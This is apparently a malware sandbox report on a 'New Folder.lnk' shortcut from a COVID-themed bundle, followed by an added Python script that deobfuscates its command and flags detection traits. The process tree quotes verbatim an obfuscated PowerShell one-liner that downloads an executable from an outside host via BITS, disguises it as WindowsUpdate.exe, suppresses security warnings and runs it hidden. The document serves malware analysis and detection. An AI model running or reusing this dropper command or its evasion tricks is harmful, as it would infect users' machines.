Overview

Overall score: 10/10. Per-task scores from the report's tab bar (sample names truncated as displayed; the full names are in the task list below):

  Sample                 Platform             Score
  NewCovid-2...21.exe    windows7_x64         10
  NewCovid-2...21.exe    windows10-2004_x64   10
  NewCovid-2...ed.pdf    windows7_x64          1
  NewCovid-2...ed.pdf    windows10-2004_x64    1
  NewCovid-2...er.lnk    windows7_x64         10
  NewCovid-2...er.lnk    windows10-2004_x64   10
  NewCovid-2...ic.rtf    windows7_x64          8
  NewCovid-2...ic.rtf    windows10-2004_x64    1

A static task (static1) was also run on the bundle.

Analysis

max time kernel:   129s
max time network:  133s
platform:          windows10-2004_x64
resource:          win10v2004-en-20220113
submitted:         28-02-2022 03:16

This page covers the run of NewCovid-21/New Folder.lnk on windows10-2004_x64 (behavioral6 in the task list).
Static task
static1

Behavioral tasks

  Task         Sample                                                           Resource
  behavioral1  NewCovid-21/08042021.exe                                         win7-en-20211208
  behavioral2  NewCovid-21/08042021.exe                                         win10v2004-en-20220112
  behavioral3  NewCovid-21/GEO-CFUND-2009_CCM Agreement_Facesheet - signed.pdf  win7-20220223-en
  behavioral4  NewCovid-21/GEO-CFUND-2009_CCM Agreement_Facesheet - signed.pdf  win10v2004-en-20220113
  behavioral5  NewCovid-21/New Folder.lnk                                       win7-en-20211208
  behavioral6  NewCovid-21/New Folder.lnk                                       win10v2004-en-20220113
  behavioral7  NewCovid-21/Statistic.rtf                                        win7-en-20211208
  behavioral8  NewCovid-21/Statistic.rtf                                        win10v2004-en-20220113
General

Target: NewCovid-21/New Folder.lnk

Malware Config
Extracted URL: http://buking.site/soft/08042021.exe

This is the URL that the PowerShell one-liner in the process tree assembles from string fragments at run time. The file name matches NewCovid-21/08042021.exe, which was submitted in the same bundle (behavioral1 and behavioral2), so the shortcut is the stage that fetches and runs that executable.
Signatures

Checks computer location settings  (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
    Process: cmd.exe
    Key queried: \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation

Enumerates physical storage devices  (1 TTP, no IoC listed)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
(This is the sandbox's generic description for the signature. The report attaches no IoC to it and the process tree shows only a download-and-execute chain, so it is not evidence of ransomware on its own.)

Suspicious behavior: EnumeratesProcesses  (2 IoCs)
    PID 2804 powershell.exe (reported twice)

Suspicious use of AdjustPrivilegeToken  (1 IoC)
    PID 2804 powershell.exe enabled the SeDebugPrivilege token privilege. powershell.exe does this routinely, so treat it as context rather than a finding.

Suspicious use of WriteProcessMemory  (4 IoCs)
    PID 1736 cmd.exe wrote to memory of PID 2564 (procid_target 79), reported twice
    PID 2564 cmd.exe wrote to memory of PID 2804 (procid_target 80), reported twice
    Both entries line up with the parent/child links in the process tree (cmd.exe -> cmd.exe -> powershell.exe), which is consistent with the writes a parent makes into a child it is creating rather than injection into an unrelated process.
Processes

1. C:\Windows\system32\cmd.exe  (PID 1736)
   cmd /c "C:\Users\Admin\AppData\Local\Temp\NewCovid-21\New Folder.lnk"
   Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory

2. C:\Windows\System32\cmd.exe  (PID 2564, spawned by 1736)
   "C:\Windows\System32\cmd.exe" && C:\Windows\System32\cmd.exe /c poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://buk'+'ing.si'+'te'+'/so'+'ft'+'/08'+'04'+'2021.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe
   Signatures: Suspicious use of WriteProcessMemory

3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2804, spawned by 2564)
   poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://buk'+'ing.si'+'te'+'/so'+'ft'+'/08'+'04'+'2021.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe
   Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

What the chain does: opening the shortcut runs cmd.exe (1736) on "New Folder.lnk"; the shortcut's target starts a second cmd.exe (2564) whose argument string hands the one-liner to powershell.exe (2804). The PowerShell is obfuscated three ways: mixed case, backticks spliced into cmdlet names (outside a string, a backtick before an ordinary letter is a no-op escape that the parser drops), and a parenthesised string concatenation that assembles the URL only at run time. Read plainly, it imports the BitsTransfer module, calls Start-BitsTransfer to download http://buking.site/soft/08042021.exe to %TEMP%\WindowsUpdate.exe, changes into %TEMP% and executes the file. "-w 1" is -WindowStyle Hidden, and setting SEE_MASK_NOZONECHECKS=1 in the environment is meant to suppress the "Open File - Security Warning" zone check on the downloaded executable. The download name imitates a Windows Update component. For hunting, the BITS job is recorded in the Microsoft-Windows-Bits-Client/Operational event log and is visible with Get-BitsTransfer -AllUsers while it is in flight, which makes BITS downloads started from powershell.exe a useful pivot.
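The following Python script is an added example, not part of the sandbox report and not code from the sample: it undoes the two obfuscation tricks in the PowerShell command line above (backticks spliced into cmdlet names, string concatenation of the URL), pulls out the indicators, and flags the traits a process-creation detection rule would key on. The command line is copied verbatim from the process tree; the function names, the trait list and the regular expressions are this example's own choices. It also relies on the fact that the double quotes around the concatenation are stripped by command-line argument parsing before PowerShell sees the text, which is why the expression is evaluated rather than passed as a literal.

```python
"""Deobfuscate the LNK's PowerShell one-liner and extract/flag indicators.
Added example; the only thing taken from the report is the command line."""
import re

# Command line of powershell.exe (PID 2804), copied from the process tree
# above. The backslash is doubled for Python only.
SAMPLE_CMDLINE = (
    "poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; "
    "Im`Po`RT`-modULe bItsTR`Ans`Fer; "
    "STArt-b`IT`sT`R`AN`SF`ER -Source "
    "\"('ht'+'tp'+'://buk'+'ing.si'+'te'+'/so'+'ft'+'/08'+'04'+'2021.e'+'xe')\" "
    "-Destination $ENV:TEMP\\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe"
)

# Outside a single-quoted string a backtick is PowerShell's escape character.
# It only changes meaning before these lowercase letters (`n newline, `t tab,
# ...); before anything else the parser simply drops it, which is what the
# obfuscation relies on. Keeping real escapes avoids corrupting `n and friends.
_REAL_ESCAPES = set("0abefnrtuv")


def strip_backticks(cmd: str) -> str:
    """Remove no-op backticks, leaving single-quoted text and real escapes intact."""
    out = []
    in_single = False
    i = 0
    while i < len(cmd):
        ch = cmd[i]
        if ch == "'":
            in_single = not in_single
        if (ch == "`" and not in_single and i + 1 < len(cmd)
                and cmd[i + 1] not in _REAL_ESCAPES):
            out.append(cmd[i + 1])   # keep the escaped character literally
            i += 2
            continue
        out.append(ch)
        i += 1
    return "".join(out)


# A parenthesised chain of single-quoted literals joined with '+', optionally
# wrapped in the double quotes seen on the command line (those are consumed by
# powershell.exe's argument parsing, so the expression is evaluated).
_CONCAT = re.compile(r"\"?\(\s*'[^']*'(?:\s*\+\s*'[^']*')+\s*\)\"?")


def join_concat(cmd: str) -> str:
    """Replace ('a'+'b'+...) with the single literal 'ab...'."""
    return _CONCAT.sub(
        lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'", cmd)


def deobfuscate(cmd: str) -> str:
    return join_concat(strip_backticks(cmd))


def extract_iocs(cmd: str) -> dict:
    """URLs and the BITS destination path from the deobfuscated command line."""
    clean = deobfuscate(cmd)
    dest = re.search(r"-Destination\s+(\S+)", clean, re.I)
    return {
        "urls": re.findall(r"https?://[^\s'\"()]+", clean),
        "destination": dest.group(1) if dest else None,
    }


# Traits of this one-liner that survive re-obfuscation of case and ticks.
# Each is a building block for a process-creation rule, not a rule by itself.
SUSPICIOUS_TRAITS = [
    ("hidden window (-w 1 is -WindowStyle Hidden)",
     re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)),
    ("SEE_MASK_NOZONECHECKS set to suppress the zone security warning",
     re.compile(r"SEE_MASK_NOZONECHECKS", re.I)),
    ("download via BITS (Start-BitsTransfer)",
     re.compile(r"start-bitstransfer", re.I)),
    ("drop into %TEMP% under an update-like name",
     re.compile(r"-Destination\s+\$\{?env:temp\}?\\\S*update\S*\.exe", re.I)),
    ("execution of a just-written .exe by relative path",
     re.compile(r"\.[\\/]\S+\.exe", re.I)),
]


def flag_suspicious(cmd: str) -> list:
    """Names of the traits present in the (deobfuscated) command line."""
    clean = deobfuscate(cmd)
    return [name for name, rx in SUSPICIOUS_TRAITS if rx.search(clean)]


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_CMDLINE))
    print(extract_iocs(SAMPLE_CMDLINE))
    for hit in flag_suspicious(SAMPLE_CMDLINE):
        print("  [!]", hit)
```

The two normalisation steps are deliberately conservative: backticks inside single-quoted strings and in front of real escape letters are left alone, and only concatenations with at least one "+" are joined, so `.('cd')` is untouched. Matching on the normalised text rather than the raw command line is what lets a single Start-BitsTransfer rule catch both this sample and a re-ticked variant.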